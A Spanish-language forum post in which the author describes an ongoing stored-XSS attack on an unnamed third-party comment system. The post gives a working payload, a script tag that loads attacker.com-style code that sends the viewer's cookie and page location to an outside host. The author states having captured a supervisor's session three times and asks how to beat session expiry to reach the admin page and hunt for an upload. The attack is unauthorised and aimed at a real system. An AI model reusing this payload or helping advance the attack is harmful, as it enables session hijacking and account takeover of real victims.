hola  !.
Pues necesito su ayuda, asi esta la cosa:
Existe un sistema en donde tu pones tu duda, sugerencia, comentario etc.. y una persona te responde a tu comentario (en un par de dias ) bueno, la cuestion es que ese sistema es vulnerable a xss (lo se por que ya he hecho pruebas), el sistema al que estoy atacando es completamente desconocido (yo envio el comentario y puedo verlo desde el punto de vista de un usuario comun, pero no tengo idea de lo que ve el encargado) nisiquiera se puede saber en que pagina va a ser visualizado el mensage, entonces lo que hice fue esto:
linea de escape en el msg

<script src=http://atacante.com/script.js ></script>

script.js

window.onload=function(){
var a = document.getElementsByTagName("body");
var ar = a[0];
ar.innerHTML += "<img height=1 width=1 src=http://atacante.com/script.php?ref="+escape(document.location)+"&cook="+escape(document.cookie)+" >";
}

asi consigo la cookie y tambien se donde usarla =D

El problema es que el sistema se desloguea automaticamente despues de 10 mins de no hacer nada,
todo el sistema esta administrado por sessiones (entonces capturar la cookie no me ayuda a descifrar nada).

Ya he conseguido la cookie del supervisor 3 veces, tambien se donde esta la pagina de administracion pero el problema es que cuando intento usar la session obtenida ya esta caducada, no tienen alguna idea de como puedo avanzar?

saludos!

y si uso la cookie al instante?
creo que se puede con sockets, asi aunque sea puedo guardar las paginas que puede ver y saber si hay algun upload o algo que me sirva, pero no tengo idea de como usarlos, alguien tendra un tutorial?